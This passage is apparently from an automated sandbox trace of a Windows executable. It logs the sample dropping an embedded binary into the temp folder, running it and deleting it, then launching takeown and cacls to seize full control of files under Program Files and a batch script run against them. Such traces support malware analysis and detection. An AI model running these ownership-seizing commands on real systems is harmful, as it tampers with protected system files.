Flags=0x8, Size=0x2c) returned 0x557588 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x54) returned 0x5575c0 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x52) returned 0x557620 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x557680 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x5584d0 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x54) returned 0x5576b8 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x557718 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x30) returned 0x557748 [0191.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x8c) returned 0x557780 [0191.704] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x557850 | out: hHeap=0x540000) returned 1 [0192.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x800) returned 0x557818 [0192.034] GetLastError () returned 0x0 [0192.034] SetLastError (dwErrCode=0x0) [0192.034] GetLastError () returned 0x0 [0192.035] SetLastError (dwErrCode=0x0) [0192.035] GetLastError () returned 0x0 [0192.035] SetLastError (dwErrCode=0x0) [0192.035] GetACP () returned 0x4e4 [0192.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x220) returned 0x558020 [0192.035] GetLastError () returned 0x0 [0192.035] SetLastError (dwErrCode=0x0) [0192.035] IsValidCodePage (CodePage=0x4e4) returned 1 [0192.036] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0192.036] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0192.038] GetLastError () returned 0x0 [0192.038] SetLastError (dwErrCode=0x0) [0192.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0192.040] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0192.040] GetLastError () returned 0x0 [0192.041] SetLastError (dwErrCode=0x0) [0192.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0192.041] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.041] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0192.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\x83Û\x16äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0192.041] GetLastError () returned 0x0 [0192.041] SetLastError (dwErrCode=0x0) [0192.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0192.041] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0192.041] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0192.041] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0192.041] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ]\x83Û\x16äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0192.042] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x80) returned 0x558248 [0192.460] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0192.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0192.460] RtlSizeHeap (HeapHandle=0x540000, Flags=0x0, MemoryPointer=0x558248) returned 0x80 [0192.460] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0192.461] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0192.461] GetCurrentProcess () returned 0xffffffff [0192.461] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0192.461] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0192.461] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0192.464] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0192.464] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0192.464] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0192.464] LockResource (hResData=0x43c648) returned 0x43c648 [0192.465] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x5582d0 [0192.465] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0192.991] GetFileType (hFile=0x94) returned 0x1 [0192.992] WriteFile (in: hFile=0x94, lpBuffer=0x43c648*, nNumberOfBytesToWrite=0x37000, lpNumberOfBytesWritten=0x18df04, lpOverlapped=0x0 | out: lpBuffer=0x43c648*, lpNumberOfBytesWritten=0x18df04*=0x37000, lpOverlapped=0x0) returned 1 [0192.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1000) returned 0x559828 [0192.997] WriteFile (in: hFile=0x94, lpBuffer=0x559828*, nNumberOfBytesToWrite=0x490, lpNumberOfBytesWritten=0x18df00, lpOverlapped=0x0 | out: lpBuffer=0x559828*, lpNumberOfBytesWritten=0x18df00*=0x490, lpOverlapped=0x0) returned 1 [0192.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x559828 | out: hHeap=0x540000) returned 1 [0192.998] CloseHandle (hObject=0x94) returned 1 [0192.998] GetCommandLineW () returned="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner" [0192.998] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", lpCommandLine="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18facc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="tdq963ii.exe -accepteula \"Workflow.Targets\" -nobanner", lpProcessInformation=0x18fb10*(hProcess=0x98, hThread=0x94, dwProcessId=0xa24, dwThreadId=0xa30)) returned 1 [0193.217] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0xffffffff) returned 0x0 [0228.641] DeleteFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 1 [0228.644] CloseHandle (hObject=0x98) returned 1 [0228.644] CloseHandle (hObject=0x94) returned 1 [0228.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x557818 | out: hHeap=0x540000) returned 1 [0228.646] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0228.647] ExitProcess (uExitCode=0x0) [0228.648] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5560d0 | out: hHeap=0x540000) returned 1 Process: id = "182" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2ce13000" os_pid = "0x4e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 714 os_tid = 0xa04 Thread: id = 725 os_tid = 0xb04 Thread: id = 728 os_tid = 0x5e4 Process: id = "183" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x2dc18000" os_pid = "0xa64" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 715 os_tid = 0xa80 Thread: id = 727 os_tid = 0x75c Thread: id = 731 os_tid = 0x418 Thread: id = 732 os_tid = 0xb18 Thread: id = 733 os_tid = 0x2ac Thread: id = 734 os_tid = 0x5b8 Thread: id = 745 os_tid = 0x620 Process: id = "184" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x2e9d2000" os_pid = "0x364" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "156" os_parent_pid = "0x710" cmd_line = "takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 716 os_tid = 0xa6c Thread: id = 718 os_tid = 0x78c Process: id = "185" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x2e45b000" os_pid = "0xab0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "173" os_parent_pid = "0x6b8" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\component.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 719 os_tid = 0x72c Process: id = "186" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1b125000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 723 os_tid = 0x5b4 [0198.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34fefc | out: 